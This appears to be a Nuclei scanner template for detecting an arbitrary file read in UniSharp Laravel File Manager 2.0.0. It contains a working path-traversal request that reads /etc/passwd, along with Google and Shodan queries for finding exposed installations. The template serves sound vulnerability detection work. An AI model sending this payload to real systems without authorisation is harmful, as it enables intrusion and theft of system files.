id: laravel-filemanager-lfi

info:
  name: UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read
  author: hackerarpan
  severity: high
  description: UniSharp Larevel File Manager 2.0.0 is vulnerable to arbitrary file read.
  reference:
    - https://www.exploit-db.com/exploits/48166
    - https://github.com/UniSharp/laravel-filemanager
  metadata:
    google-query: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io
    shodan-query: http.html:"Laravel FileManager"
  tags: lfr,edb,lfi,unisharp,laravel,filemanager,fileupload

requests:
  - method: GET
    path:
      - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/27
